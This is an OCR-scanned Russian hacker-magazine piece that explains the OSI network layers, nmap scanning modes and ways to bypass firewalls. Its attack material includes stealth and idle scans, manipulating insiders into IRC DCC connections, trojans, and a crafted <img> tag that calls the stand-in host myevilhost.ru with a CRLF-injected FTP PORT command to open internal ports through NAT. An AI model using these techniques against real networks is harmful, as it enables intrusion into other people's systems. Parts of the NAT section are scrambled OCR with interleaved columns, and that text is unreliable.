Допустим, тебя достал твой модем, и ты решил строить домашнюю сеть. Что 
ты выберешь: коаксиальный кабель, витую пару или, может быть, оптово- 
локно? Или все вместе? Мы опять выбираем оборудование физического 
уровня: кабели, разъемы, повторители, концентраторы. От выбора физиче- 
ского оборудования зависит пропускная способность твоей сети: 10 мега- 
бит в секунду, 100 мбит/сек или 1 Гигабит. 

Один из способов обхода файрволла - подсоединение к чужому кабелю или 
подключение своего модема к одному из компов вражеской сети. Для это- 
го хакеру нужно знать, что творится на физическом уровне! 


Канальный уровень 


Канальный уровень отвечает за связь между двумя устройствами, подклю- 
ченными к одной физической среде, фактически к одному шнуру. Каналь- 
ный уровень должен с помощью последовательности электрических сигна- 
лов физического уровня доставить информацию. 

Допустим, на одном коаксиальном кабеле у тебя висят три компа, у каж- 
дого по сетевой карте. Каждая сетевая карта имеет свой адрес доступа 
к среде (MAC - Media Access Control). Этот адрес для многих карт про- 
шивают на заводе, а для некоторых можно запрограммировать самосто- 
ятельно. По этому адресу карточки, подключенные к одному шнуру (к 
одной среде), могут обнаружить друг друга. Кроме того, чтобы нор- 
мально обмениваться данными, им нужно исправлять ошибки и запра- 
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шивать недошедшие данные. Эти задачи и решает протокол канально- 
го уровня. 

Если ты строишь локальную сеть, то частично за адресацию и контроль 
ошибок отвечает сам стандарт твоей сети. Стандарты Ethernet, Token Ring, 
Fast Ethernet, Gigabit Ethernet и другие включают в себя описание физиче- 
ского и канального уровней. 

Чтобы устройства могли общаться на канальном уровне, нужно, чтобы все 
они были подключены к одному кабелю и использовали один стандарт! 
Что же делать, если у тебя в локальной сети сотня компов? Они же будут 
мешать друг другу! Если один компьютер занял провод, то остальные пе- 
редавать не могут! А если пытаются, то начинаются глюки и передавать не 
может никто! Для того чтобы разбить провод на сегменты, используют 
коммутаторы и мосты. Они пропускают сквозь себя только те кадры, ад- 
рес которых лежит в другом сегменте. Поэтому компьютер при передаче 
информации занимает не весь шнур, а только один сегмент. Коммутатор 
(switch - переключатель) это мост с большим количеством портов. Мост 
(bridge) - это коммутатор с двумя портами. Один мост делит сеть только 
на два сегмента, а коммутатор на несколько, вот и все различия. 

Если провод один, а по нему хотят передавать компьютерные данные, к не- 
му же хотят подсоединить телефон, сигнализацию, систему видеонаблюде- 
ния и телевизор, то используют мультиплексор. Мультиплексор может упа- 
ковать несколько разных протоколов в один протокол канального уровня. 
У современных модемов тоже есть некоторые свойства канального уровня, это 
протоколы коррекции ошибок и сжатия данных, такие как V.42, V.42bis, MNP. 
Даже если ты подключишь два компа через СОМ-порты напрямую, то они 
будут использовать протокол канального уровня для коррекции ошибок и 
управления скоростью связи. 

Почти все протоколы канального уровня основаны на SDLC (стандартный 
канальный протокол ISO), есть много модификаций и разновидностей: 
HDLC, Frame Relay, Lap-B, LLC. 

Хакеры хорошо разбираются в тонкостях канального уровня. Если хакеру 
удалось подключиться к одному сегменту с администратором, то можно 
подслушать его пароли и МАС-адрес, чтобы ломануть сервер. Ведь компью- 
теры принимают всю инфу, которая идет по проводу, и только после этого 


ISO/OSI 


выбирают адресованные им кадры no МАС-адресу. Так что есть возмож- 
ность читать чужие сообщения и отправлять их от чужого имени! 

Современные файрволлы умеют работать с МАС-адресами. Поэтому, если 
хакер занимается вредительством в локальной сети, ТР-адрес подделать 
недостаточно! Ведь вредителя могут найти по МАС-адресу его сетевой кар- 
ты. Даже если негодник украл пароль администратора, то правильно наст- 
роенный файрволл не пустит его на сервер с неправильным МАС-адресом. 


Сетевой уровень 


Протокол IP (Internet Protocol) известен тебе намного лучше, мы уже просто 
замусолили его в своих выпусках по взлому! Теперь давай разберемся, зачем 
же он нужен, если есть такой великолепный протокол канального уровня? 
Из описания канального уровня ты должен был понять, что на этом уровне 
могут общаться компьютеры, подключенные к одному шнуру, причем во вре- 
мя передачи один комп на некоторое время занимает весь шнур. То есть чем 
больше компов, тем больше простои. А теперь представь, что у тебя лежит 
коаксиальный кабель, потом оптоволокно, потом спутник, потом радиомо- 
дем, потом снова оптоволокно. И у каждого стандарта свой способ адреса- 
ции. По коаксиальному кабелю бегает Ethernet с МАС-адресами, а по оптово- 
локну - HDLC со своей адресацией. И как же передать из од- 

ной сети в другую? Никак! (Есть, конечно. технологии для из- 

вращенцев - прим. извращенца.) Канальный уровень этого не 

умеет, потому что нужен глобальный сетевой адрес - ТР-ад- 

рес. Его можно присвоить каждому компьютеру в мировой 

сети, и неважно, на чем он сидит, на модеме или на спутнике. 


ТАИСУ 


Компьютеры ТАЙСУ на базе 
процессора Intel® Pentium® 4 
- ЦЕНТР вашей ЦИФРОВОЙ ВСЕЛЕННОЙ ! 
НАШИ ЦЕНЫ НЕ КУСАЮТСЯ, ОНИ ЕЩЕ МАЛЕНЬКИЕ ! 


951-0656, 959-4809 


тел: 359-8088 


ten: 720-0031 


penti um ij 


ЙПоготипы intel Inside и Роли + зарегистрированные товарные энаюн Intel Corporation и ee филиалов в США и других странах. 


FIREWALL 


Еще одна проблема, когда Ha шнуре, разбитом коммутаторами на сегменты, 
висит тысяча компьютеров! Если компьютер, с которым нужно связаться, 
находится в каком-то дальнем сегменте, то придется отправлять инфу во 
все сегменты. А это значит, что один компьютер снова займет всю сеть на 
время передачи. Если нужно часто обращаться к дальним компьютерам, 
начнутся штормы чужих сообщений! Кроме того, есть возможность отправ- 
лять сообщения всем станциям (широковещательно), такие сообщения 
коммутаторы не блокируют. И возникают широковещательные штормы. 
Одним словом, при современных объемах передаваемой инфы нужно 
уменьшать количество компьютеров, висящих на одном шнуре. 

Другое дело - маршрутизатор! Он работает на сетевом уровне и умеет про- 
кладывать маршруты, то есть отыскивать в своих таблицах путь к адресату, 
вместо того чтобы размножать сообщение на всю сеть. Пространство Ин- 
тернет разбито на сети, то есть у адреса есть сетевая часть. Сначала прокла- 
дывается путь к нужной сети, а потом уже на месте отыскивается нужный 
адресат. На канальном уровне сетевой части нет - считается, что все адре- 
саты сидят в одной сети. 

Кроме ТР-протокола широкое распространение получил Х.25. Этот прото- 
кол также охватывает сетевой уровень. Только вместо маршрутизации про- 
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кладываются виртуальные каналы во время установки соединения. Гло- 
бальный адрес сети Х.25 похож на телефонный номер, а маршрутизаторы - 
на телефонные станции. Вывод такой: существуют сети разного типа, где 
одни и Te же проблемы решаются разными способами. Модель ISO/OSI поз- 
воляет описать любую сеть. 

Телефонная сеть - сеть с коммутацией каналов, когда АТС соединяют (ком- 
мутируют) несколько отрезков провода в одну физическую линию. Однако 
телефонные сети сейчас активно используют мультиплексоры и пакетную 
передачу данных. 

Сеть FIDO - сеть с коммутацией сообщений. Мы отправляем сообщение, и оно 
постепенно передается от одного компа к другому, пока не дойдет до адресата. 
Сеть Internet - сеть с маршрутизацией пакетов. Очень похоже Ha FIDO, толь- 
ко сеть работает в режиме ONLINE, а He OFFLINE. Хотя e-mail действует поч- 
ти так же, как FIDO. 

Сеть Х.25 - сеть с коммутацией виртуальных каналов. Такая сеть обладает 
высокими надежностью и безопасностью, поэтому используется в банков- 
ских технологиях. 

Настоящему хакеру полезно знать, что, кроме Интернет, существует много 
других сетей. Ведь взломы происходят не только через Интернет. 


Этот номер посвящен обходу интернетовских файрволлов. Поэтому важно 
знать, что простейший файрволл работает именно на сетевом уровне. 
Фильтр пакетов анализирует заголовки сетевых пакетов, достает оттуда IP- 
адреса, проверяет контрольную сумму и делает другие операции сетевого 
уровня. Обидно, но за время жизни Интернета файрволлы сильно мутиро- 
вали и научились работать на других уровнях модели ISO/OSI, это усложня- 
ет хакерам работу. 


Транспортный уровень 


На четвертом уровне ISO/OSI нас ждут новые проблемы. Если помнишь, каналь- 
ный уровень умел исправлять ошибки и запрашивать повторы. То есть по шну- 
ру инфа проходит надежно и без ошибок. Только вдруг она потеряется где-ни- 
будь между сетями, вдруг она исказится при переходе из одной сети в другую? 
Одним словом, нам нужно снова проверять ошибки и запрашивать повторы, 
после того как информация прошла через несколько сетей. Для этого и нужен 
протокол TCP/IP, отвечающий за доставку (Transmission Control Protocol). 

Как ты уже знаешь, заголовок TCP/IP имеет не только адрес, но и порт. Порт 
позволяет обратиться к определенной программе на машине. В сети Интернет 
протоколы верхних уровней лазают по определенным портам ТСР/ТР, поэтому 
в файрволлах появилась возможность анализировать и перекрывать трафик 
по определенным портам. Один из способов обхода файрволла - редирект 
портов, когда хакер переназначает нужные ему службы на открытые порты. 
Транспортные протоколы имеют массу интересных функций, поэтому позво- 
ляют хакеру массу вещей. Например, TCP/IP позволяет производить несколь- 
ко типов DOS атак, которые приводят к повисанию компьютера. Транспорт- 
ные функции протокола NetBIOS позволяют негоднику получить доступ к чу- 
жому диску и украсть важные файлы. Если порыться в реализации транс- 
портных протоколов, всегда можно найти дырочку, уж больно они сложные. 


Сеансовый уровень 


Этот уровень отвечает за установление соединения между приложениями на 
сервере и на компьютере. В обычных TCP/IP сетях нет специальных прото- 
колов этого уровня. Просто это не нужно, так как ТСР уже установил сеанс. 
Все функции сеансового уровня впитали в себя протоколы прикладного 
уровня. Например, протокол ЕТР позволяет установить сеанс связи с файло- 
вым сервером. Авторизация FTP происходит именно на сеансовом уровне. 
Другое дело - беспроводные протоколы, такие как WAP (Wireless Access 
Protocol). Этот один из протоколов, используемый для доступа в Интернет 
с мобильного телефона. В WAP входит специальный протокол установки 
сессии WSP (Wireless Session Protocol). Заодно на этом уровне происходит 
шифрование сообщения. При обычном доступе в Интернет ты открываешь 
для каждой службы свою транс- 

портную сессию TCP/IP (порт). 
На мобильном телефоне 
транспортная сессия одна, и 
уже поверх нее софт телефо- 

на связывается с сервером. 
Этот уровень позволяет подклю- 
чить к Интернет даже такой 
нестандартный софт, как те- < и 
лефонный браузер. ° 
Потребность в сеансовом 9 9 
уровне возникает всегда, когда 

нужно как-то нестандартно подклю- 
читься к Интернет. Например, в том случае, когда ты запросы посыла- 
ешь по модему, а ответы принимаешь через спутниковую тарелку. 

Если необходимо установить шифрованный сеанс связи между приложения- 
ми, также выручает сеансовый уровень. Пример такого специализированного 
протокола сеансового уровня для защиты соединения - протокол SSL (Secure 
Socket Level - Уровень Безопасности Сокета). Он позволяет защитить весь стек 
протоколов прикладного уровня перед тем, как они отправятся в сокет. 
Также сеансовый уровень спасает любителей закачки с Интернет многоме- 
габайтных файлов с порномультиками по модему. Средствами сеансового 
уровня можно запоминать контрольные точки и после разрыва соединения 
возобновлять закачку не заново, а с контрольной точки. 


Представительский уровень 


Уровень представления данных позволяет прочитать текст на машинах с 
разной кодировкой. Позволяет распознать структуру каталогов на удален- 
ной операционной системе. Одним словом, это нужно, чтобы китайский вы- 
глядел китайским независимо от того, на каком компьютере ты его смот- 
ришь. К сожалению, так не получается, и все еще очень часто мы сталкива- 
емся с глюками кодировок. 

В идеале этот уровень должен распознавать данные любого стандартного 
формата и конвертировать их в тот вид, который понимает локальная маши- 
на. 

В стандарте ISO/OSI именно этот уровень должен отвечать за шифрование 
данных, однако в случае с SSL эту функцию выполняет сеансовый уровень. 


ISO/OSI 


Прикладной уровень 


На этом уровне живут специализированные протоколы каждой службы. 
Например: НТТР для загрузки страничек веб-браузерами, ЕТР для удален- 
ного взаимодействия с файловой системой, SMTP и POP3 для отправки и 
получения мыла, Telnet для получения доступа к командной строке уда- 
ленного сервера. Сколько приложений - столько прикладных протоко- 
лов. Однако в сетях TCP/IP прикладные протоколы включают в себя 
функции представительского и сеансового уровней. Поэтому в сети 
TCP/IP три уровня (прикладной, представительский, сеансовый) объеди- 
НЯЮТ В ОДИН И называют прикладным. 


Как использовать ISO/OSI 


Как ты уже понял, все эти протоколы вкладываются один в другой, как мат- 
решка. Например, HTTP инкапсулируется в ТСР, ТСР в IP, IP в Ethernet. 
Ethernet кадр преобразуется в электрический сигнал и передается по кабе- 
ЛЮ, а на другом конце все распаковывается в обратной последовательности. 
Как ты заметил, далеко не все протоколы точно соответствуют определен- 
ным уровням модели OSI. Это и не нужно, главное - они умеют инкапсули- 
роваться (упаковываться) друг в друга. 

Модель ISO/OSI позволяет объединить все сети мира в одну. Ведь в IP мож- 
но инкапсулировать Х.25. A B X.25 можно инкапсулировать ТР. То есть мы мо- 
жем инкапсулировать все что угодно во все что угодно, практически на лю- 
бом уровне OSI. Это называется туннелированием, то есть в сети X.25 мы 
прокладываем ТР-туннель. Или внутри сети ТР мы прокладываем телефон- 
ный туннель - ТР-телефонии. Или внутри телефонной сети мы прокладыва- 
ем туннель V.90 модемного соединения, который несет в себе ТР-трафик. 
Штука эта очень полезная, а хакеры, как всегда, используют ее во вред. На- 
пример, для обхода файрволла, на котором закрыто все, кроме почты, че- 
рез почтовый протокол SMTP можно проложить туннель ТР и сидеть в Ин- 
тернете на халяву. 

К современным файрволлам администраторы прикручивают анализато- 
ры пакетов, которые, кроме сетевых и транспортных пакетов, тормошат 
пакеты прикладного уровня, пытаясь найти скрытые туннели, вирусы, 
порнографию. 

Однако против хитрого хакера, который знает много протоколов и хорошо 
представляет их взаимодействие в виде модели ISO/OSI, бороться практи- 
чески бесполезно. Хакер всегда выиграет, воспользовавшись тонкостями 
реализации очередного протокола! 
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Бесконечное богатство полезной информации хранится за корпоративными и 
иными фаерволлами, во внутренних и домашних сетях, на серверах, рабочих 
станциях и просто домашних компьютерах. Но если у этих компьютеров есть 
доступ во внешний мир, значит, и у внешнего мира есть доступ к ним, а частенько 
икхранящейся там информации (ну, хоть ты наизнанку вывернись!). Кому-то эта 
статья может показаться наивной, но я надеюсь, что для кого-то она все же 
окажется полезной и откроет глаза как на несовершенство используемых 
программ, так и на несовершенные конфиги и забытые дефолтные возможности, 
которые треба вырубать сразу. Грамотная разведка - 50% успеха атаки. 


РАЗВЕДКА БОЕМ 


Итак, когда ты уже выбрал цель - самое время произвести разведку и выяснить, 
какие силы нам противопоставляют админы. Если исследуется сеть, то - как она 
устроена изнутри, какие сервисы имеются в наличии и тому подобную полезную 
инфу. Обычно самой подробной информацией такого рода обладают... сами 
админы сети, они же могут помочь получить доступ ко внутренним ресурсам. Но 
если ты не готов заплатить братве за поимку и раскалывание админа, то есть и 
более дешевые, хотя и не такие надежные методы :). 


ММАР 


Тулза ММАР (http://www.insecure.org/nmap) от небезызвестного дяди Fyodor’a 
поможет нам многое узнать. Это мощный инструмент, который позволит в разных 
режимах просканировать сети и отдельные хосты, по особенностям ответов 
сетевого стека исследуемой цели угадать, какая операционка запущена на той 
стороне. В лучших традициях сетевой общественности птар раздается в виде 
исходников, но если тебе неохота заморачиваться с компиляцией, тебе дадут и 
уже скомпилированные бинари для твоей О5'ки, в том числе и для разных версий 
WindowZ. Тем, кому не хочется возиться с командной строкой, дадут даже 
графическую морду. 

Самый простой режим использования - это просто запустить пар и указать ему 
цель для исследования: 


$ птар 172.17.10.55 
Starting nmap V. 3.00 (www.insecure.org/nmap/) 


Interesting ports on testbox.sample.ru (172.17.10.55): 
(The 1594 ports scanned but not shown below are in state: closed) 


Port State Service 
22/tcp open ssh 

25/tcp open smtp 
53/tcp open domain 
79/tcp open finger 
110/tcp open pop-3 
113/tcp open auth 
8080/tcp open http-proxy 


Nmap run completed — 1 IP address (1 host up) scanned in 4 seconds 


Из приведенного вывода можно узнать, что машинка с таким IP включена и 
отвечает на сетевые запросы. Также нам дали список портов, на которых кто-то 
отвечает с предположением, кто бы это мог быть. Если птар был запущен от 
обычного непривилегированного пользователя, то он использует так называемый 
«грязный» ТСР скан, после которого в логах на той стороне остаются наши следы: 


Sep 21 06:19:14 testbox sshd[2188]: Did not receive identification string 
from 213.25.7.123 

Sep 21 13:37:08 testbox xinetd[976]: START: pop3 pid=2473 
from=172.17.10.90 


016 november/11/2002 


Абсолютно защищенный компьютер изготовлен целиком 
из бетона, без примеси кремния 


рис. Борис Алексеев 


Запущенный от рута или с опцией -sS - nmap выбирает более безопасный режим 
сканирования, который обычно не оставляет следов в логах, хотя некоторые 
пакетные фильтры и способны обнаруживать такие попытки. Секрет невидимости 
сканирования (SYN scan, или half-open scanning) заключается в том, что мы не 
устанавливаем соединение до конца, для каждого порта высылается пакет на 
установление соединения (с установленным SYN флагом); в случае, если та 
сторона отвечает, что порт открыт и соединение может быть установлено 
(выставлены флаги SYN и АСК), то мы запоминаем этот факт и высылаем пакет, 
запрашивающий сброс соединения (флаг RST) вместо пакета с подтверждением. 
Бай, бейби! Если же мы в ответ получаем пакет с отказом, значит, этот порт никем 
не слушается либо прикрыт фаерволлом, что мы также запоминаем. 
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НЕВИДИМЫЙ, ЕЛОВЫЙ И НУЛЕВЫЙ СКАНЫ 


Помимо этого есть еще три типа сканирования: Stealth FIN, Xmas Tree и Null scan, 
которые включаются, соответственно, как -$Ё -SX -SN. Эти режимы полезны, чтобы 
обмануть некоторые фаерволлы и пакетные фильтры, которые обнаруживают 
предыдущий вид сканирования, следя за приходом SYN пакетов Ha 
запрещенные/никем не обслуживаемые порты. Эти режимы посылают пакет с 
установленным флагом завершения соединения (-SF и -5Х) либо вообще без 
флагов; ответы для открытого и закрытого порта должны различаться, что нам и 
нужно. К сожалению, в фирме Microsoft, как всегда, креативно подошли к 
интерпретации сетевых стандартов, и все пакеты такого вида совершенно 
игнорируются, так что эти опции не применимы для сканирования Windows-Tayek. 


СКАН ОТ ЧУЖОГО ИМЕНИ 


Еще один скрытный вариант сканирования - это так называемый Idle scan, 
включаемый по опции -sI host или -51 host:port. Вместо host необходимо 
подставить 1Р-адрес какого-нибудь сетевого хоста, желательно, чтобы через этот 
хост проходило как можно меньше траффика в момент сканирования. В случае 
использования этого режима сканирование выглядит как выполняемое с того 
самого хоста, который мы указали как параметр к опции -$1, что, несомненно, есть 
очень гут. Второй плюс такого сканирования в том, что мы видим список 
открытых портов с точки зрения того хоста, через который выполняется 
сканирование, так что при аккуратном выборе можно узнать кое-что из того, что 
владельцы внутренней сети и фаерволла хотели бы скрыть. 

Очень сходный результат с предыдущей опцией можно получить, проводя 
сканирование через Ир-сервер (можно указать с помощью опции -b изег- 


name:password@server:port), присутствуют все те же плюсы, что и в 
предыдущем пункте. Единственная проблема заключается в том, что ftp- 
серверов, поддерживающих «Ёр ргоху» соединения в Интернете, становится с 
каждым днем все меньше. 


СЛУШАЕМ НЕПИНГУЮЩИХСЯ 


По умолчанию nmap сканирует только те тачки, которые отвечают Ha ping 
запросы (такой запрос посылается перед сканированием), так как некоторые 
фаерволлы блокируют такие запросы, этот режим можно отключить с помощью 
опции -PO. 


А ТЕПЕРЬ UDP 


Все сказанное выше относилось к сканированию ТСР-портов. Nmap также 
способен сканировать и УОР-порты. Для этого служит опция -SU. Несмотря на то, 
что обычно самые интересные и дырявые сервисы слушают только ТСР-порты, все 
же существуют сервисы, рассчитанные на UDP. В частности многие КРС-сервисы 
(включая nfs) в Solaris известны своей дырявостью. Также, если повезет, можно 
найти установленный и готовый к работе бекдор BackOrifice от cDc или еще что- 
нибудь подобное. К сожалению, одним из недостатков ЦОР-сканирования 
является его низкая скорость, так как многие операционки искусственно 
ограничивают количество отказов в соединении по закрытым UDP-noptam. 
Например, Linux по умолчанию дает не более восьмидесяти отрицательных 
ответов за четыре секунды, Solaris имеет еще более строгий лимит в два отказа в 
секунду. К счастью, Windows не вводит никаких ограничений на эту тему, так что 
сканировать ЦОР-порты в Windows легко, быстро и приятно. 


ЧЕКНЕМ САМУ ОГНЕСТЕНУ 


В режиме сканирования -5А можно попытаться получить некоторые сведения о 
правилах в фаерволле, а также является ли он простым пакетным фильтром либо 
запоминает состояние всех проходящих через него соединений. Порты, которые 
обозначены как «filtered», в результатах работы птар явно закрыты огнестеной. 
Еще один режим сканирования, похожий на предыдущий, включается 
параметром -sW. Помимо определения прикрытых фаерволлом портов он также 
в некоторых случаях способен определить и открытые порты (работает в случае, 


РАЗВЕДКА 


если на той стороне тусуются некоторые виды операционок, в частности *BSD, 
SunOS 4.x). 


ГАДАЕМ ИМЕНА 


Опция -sR пытается отослать на все открытые порты ЕКРС-команду NULL, и если 
получает вразумительный ответ - получает от обнаруженного сервиса его имя и 
версию. 

Используя опцию -0, можно попросить птар угадать, какая версия 05 запущена 
на интересующем нас хосте, а в некоторых случаях также и сколько времени 
прошло с момента последней перезагрузки. Этот анализ производится на основе 
ответов 05 на специально скомпонованные правильные и неправильные сетевые 
пакеты. К сожалению, если зло-админ системы менял настройки ТСР-стека, такое 
угадывание становится неэффективным. Для предыдущего примера в самом 
начале результат угадывания выглядит так: 


Remote operating system guess: Linux Kernel 2.4.0 - 2.5.20 
Uptime 13.057 days (since Sun Sep 8 13:14:58 2002) 


Используя ОПЦИЮ -I, можно выяснить, от какого пользователя запущен тот или 
иной сетевой сервис. К сожалению, это работает, только если в списке сервисов 
есть «auth» и выполняется «грязный скан». 


МНОГОСТАНОЧИМ 


Nmap способен сканировать больше чем один хост за раз. Для этого можно 
перечислить список ТР адресов или хостемов в командной строке. Для 
сканирования сетей существуют способы указать сразу сеть целиком, например, 
для сканирования всех хостов, чей адрес начинается на 192.168, можно 
воспользоваться такими сокращениями: 192.168.0-255.0-255 или ‘192.168.*.*’ 
или даже 192.168.1-50,51-255.1,2,3,4,5-255. И, конечно же, можно просто указать 
маску подсети: 192.168.0.0/16. Используя ‘*’, помни, что многие шеллы пытаются 
подставлять имена файлов, так что не забывай заключать такие конструкции в 
одинарные кавычки. 


ar 
ofl 


page 017 


FIREWALL 


Итак, разведка дала свои результаты, пора проверить 
на прочность саму огнестену. Ты в курсе, что иногда стену 
легче обойти, чем стучаться в нее головой и яйцами :)? 


проходим сквозь фаерволл 


GREEN ( 


АТАКА НА ФАЕРВОЛЛ 


В случае, когда фаерволл вынесен на отдельный хост либо используется 
кисковская или еще какая железка, то можно считать фаерволл одним из 
самых защищенных хостов сети и не тратить на него время. Совсем другое 
дело, когда помимо функций фаерволла на компе выполняются другие 
сервисы. Такое решение можно встретить довольно часто ввиду его 
дешевизны (жилят деньги пузатые начальнички). Порядок действий в этом 
случае очевиден - проверяем, ломаются ли какие из торчащих наружу 
сервисов хотя бы до локального шелла. 


ДУРИМ СТЕНКУ ИЗНУТРИ 


А имея локальный шелл, уже можно собрать редиректор, который будет 
переправлять наши пакеты внутрь «защищенной» сети, как будто эти 
пакеты исходят от самого фаерволла, ну и, само собой, переправлять нам 
ответы изнутри. Фишка в том, что фаерволл частенько выполняет функции 
перенаправления пакета внутрь сети, после того как его просмотрит. А 
если мы сидим внутри фаерволла, то, естественно, имеем его ТР’шник, а 
значит, имеем сетку, расписываясь от имени тачки-фаерволла. 

В случае получения рутового акцесса все еще проще, можно изменить 
настройки фаерволла так, как нам нужно. Стоит также обратить внимание 
на наличие уже запущенных редиректоров, призванных помогать 
внутренней сети получать доступ в Инет, но в результате админских 
глюков не закрытых от доступа снаружи. Нам вполне подойдет открытый 
socks или https-npokcu. Если имеется ftp-ceppep, то также можно 
выяснить кое-что для себя полезное. 


ВЫЦЕПЛЯЕМ ВНУТРЕННИЕ АДРЕСА 


Для успешного использования редиректора пакетов неплохо бы узнать 
используемые внутри сети адреса. Не слать же запросы наудачу! Так 
можно истратить лучшие годы жизни на ожидание. Если ты уже получил 
локальный Wenn, то самое время запустить /sbin/ifconfig, который 
покажет все работающие сетевые интерфейсы, связанные с ними адреса 
и сетевые маски. Отбрось тот, через который ты пришел, а также другие 
внешние каналы (если их больше одного), и все остальное - внутренняя 
сеть. Самое время ее сканировать. 


ЗАСЛАННЫЕ КАЗАЧКИ 


Без шелла все не так тривиально, и придется попросить помощи у тех, кто 
живет внутри. Например, если известно, что внутри защищенной сети кто- 
то постоянно отвисает в irc, то самое время зайти в ту же Ттс-сеть и завязать 
с этим челом разговор. Наша цель в данном случае - чтобы он открыл к нам 
DCC соединение, будь то DCC-chat или просто файлик, который мы у него 
попросим. Стоит предвидеть, что чел начнет плакаться на неработу ОСС :). 
Самое время вспомнить про НЛП и свой дар убеждения. Результатом 
успешной работы будет запрос, выглядящий примерно так: 


*** DCC CHAT (chat) request received from green— [172.17.10.90:40251] 


В данном случае 172.17.10.90 - это и есть один из адресов во внутренней 
сети, по которому можно понять, что, скорее всего, используется сеть 
172.17.10.0/24. Естественно, это работает только в том случае, если 
используемый фаерволл ничего не знает про irc-npoToKon. Если же в 
запросе приехал нормальный адрес и DCC нормально работает, то у нас 
есть три варианта: адрес совпадает с одним из адресов фаервольного 
компа, чел либо имеет шелл на фаервольном компе и ходит оттуда, либо 
фаерволл знает про DCC и правильно подменяет адреса в проходящих 
через него пакетах. Все эти варианты представляют для нас практическую 
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ценность, и их стоит запомнить. Еще один вариант - это использование во 
внутренней сети обычных ТР-адресов, просто прикрытых фаерволлом OT 
доступа снаружи. В таком случае мы также получаем данные об 
используемых внутри сети адресах. 


НЕ ИРЦЕМ ЕДИНЫМ... 


Даже если в конторе никто не юзает irc, еще не все потеряно - ведь у нас 
в запасе есть очень богатый возможностями протокол ftp. Можно 
попытаться заставить кого-то из внутренней сети нажать на ссылку, 
подобную этой: 


<a href=«ftp://myevilhost.ru:1111/pub/somefile»>. 


В данном случае myevilhost.ru - это комп, на котором у тебя есть 
возможность запустить сервер на 1111-м порту (либо на любом другом, 
тогда нужно поправить ссылку). На 1111-м порту нужно запустить 
модифицированный ftp-cepBep, который будет запоминать все PORT- 
команды. В случае, если клиент не ходит через ftp/http-npokcu, - это, 
наверняка, сработает, и ты увидишь в созданном логе строчки наподобие 
этой: PORT 1,2,3,4,0,44452. Это значит, что у клиента был адрес 1.2.3.4. 
Подобную ссылку можно завернуть в письмо, посланное внутрь сети. Но 
если <a href=«...»> ссылка требует ручного нажатия, что не всегда удобно, 
To <img src= «ftp://myevilhost.ru:1111/pub/somefile»> может 
выполниться и само по себе. Зачем утруждать клиента :)? 


ХОД КОНЕМ 


Еще одним способом получить множество информации о внутренностях сети 
является засылка туда трояна, который может не только узнать используемые 
внутри сети адреса, но также установить туннель ствоим хостом для удобства 
исследования сети, собрать и отослать нужные файлы и тому подобное. К 
сожалению, этот способ эффективен, только если широко расплодившиеся в 
последнее время антивирусы не уничтожат твоего троянца по пути к месту 
назначения, и к тому же внутри сети трояну удастся запуститься. Мы 
рассмотрим кое-какие триксы, применяемые в троянах ниже. 


ПУБЛИЧНЫЕ СЕРВЕРА В ОДНОЙ СЕТИ 


С ВНУТРЕННИМИ КОМПАМИ 

Не так уж редко можно столкнуться с архитектурой, при которой за 
фаерволлом сидят сервера и рабочие станции внутри одной сети. При 
этом часть серверов находится в публичном доступе, и фаерволл 
пропускает пакеты к этим серверам, а часть серверов и рабочие компы 
фаерволлом прикрыты и имеют, например, адреса из private address space 
типа 192.168.0.0/16. В этом случае полностью применимо все сказанное 
выше относительно сервисов на фаерволле, то есть, сломав один из таких 
видимых снаружи серверов, получаем полный доступ в локальную сеть. К 
тому же, сломав один из серверов, можно получить расширенный доступ 
и ксоседним серверам. Мало кто станет закрывать свои сервера друг от 
друга, и если снаружи зайти на 139-й порт windows-cepBepos не удастся 
из-за фаерволла, то сделать это изнутри скорей всего удастся. 


ОБХОДИМ МАТ 

МАТ расшифровывается как Network Address Translation. Общий принцип 
работы заключается в перехвате пакетов, посланных из внутренней сети 
фаерволлом и подмене внутренних адресов на внешние, при этом 
составляется табличка соответствия между парой внешний 
(подставленный) ТР, внешний (подставленный) порт и внутренний 
(изначальный) ТР и порт. Когда на отправленный запрос приходит ответ, 
по адресу и порту фаерволл 


АТАКА 


(то есть клиентам вообще по барабану, есть фаерволл или его нет), а 
потому очень популярна. 
На самом деле такая «прозрачность» легко осуществима только для простых 
протоколов, которым достаточно одного соединения типа НТТР. С более 
сложными протоколами, например FTP, все обстоит гораздо сложнее. При 
работе по FTP-npotokony открывается так называемое управляющее 
соединение, по этому соединению сервер и клиент обмениваются 
командами и ответами на 


выясняет, куда необходимо о команды. Когда необходимо 
отправить этот ответ во передать файл или другие, не 
внутренней. сети; еще pas МАТ расшифровывается как Network Address управляющие: данные, 
подменяет IP и порт и Tranclason, Общий паинцип сабо открывается еще одно 
отправляет пакет внутрь. Такая eet ринципр соединение, по которому 


схема работы не требует ед Berens Nake Tes NOCHShhels данные и передаются. Причем 
специальной настройки из внутренней сети фаерволлом и подмене открытие соединения 
клиентских программ и внутренних адресов на внешние, при этом осуществляется со стороны 
полностью для них прозрачна составляется табличка соответствия между сервера на адрес и порт, 


парой внешний (подставленный) IP, внешний 


(подставленный) порт и внутренний 
(изначальный) IP и порт. 
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указанные клиентом. Чтобы такие сложные последовательности работали 
через МАТ, в него обычно встраиваются специальные хелперы для 
определенных протоколов (обычно протоколы определяются по портам), 
которые обрабатывают управляющие команды протоколов и подменяют, 
если это необходимо, адреса не только в пакетах, но и в командах внутри 
пакетов. Поскольку, согласно протоколу, клиент передает не только адрес 
для соединения, но и порт, это открывает нам возможность обратиться 
практически к любым портам машин, находящихся за фаерволлом с 
включенным NAT и поддержкой active ftp соединений. К примеру, можно 
послать внутрь такого рода сети письмо, содержащее html тег <IMG 
SRC=»ftp://ftp.myevilhost.ru/aaaaa%0d%0aPORT  1,2,3,4,0,139»> либо 
убедить юзера из той сети зайти на Нёт(-страничку с таким тегом и запустить 
на ftp.myevilhost.ru специальным образом пропатченный ЕТР-сервер, 
который не будет открывать по указанному адресу/порту соединение, а 


просто запомнит адрес и порт. В таком случае, с точки зрения МАТ, клиент 
посылает такую последовательность контрольных команд: 


RETR ааааа PORT 1,2,3,4,0,139 


После необходимой подмены ftp серверу приходит пакет с настоящим IP- 
адресом и портом, при коннекте на который на самом деле соединение 
будет установлено со 139-м портом внутреннего компа. Естественно, 
можно использовать не только 139-й, но и любой другой. 

Помимо ftp подобными же свойствами обладают протоколы DCC (в irc), 
Oracle SQL*Net (версия, использующая раздельные каналы данных), 
RealAudio/Video (использует дополнительный ЦОР-канал), H.323 
(NetMeeting и тому подобные). 


Очень похожий глюк можно использовать и против ftp сервера, 
находящегося за фаерволлом и работающего в passive режиме. В данном 


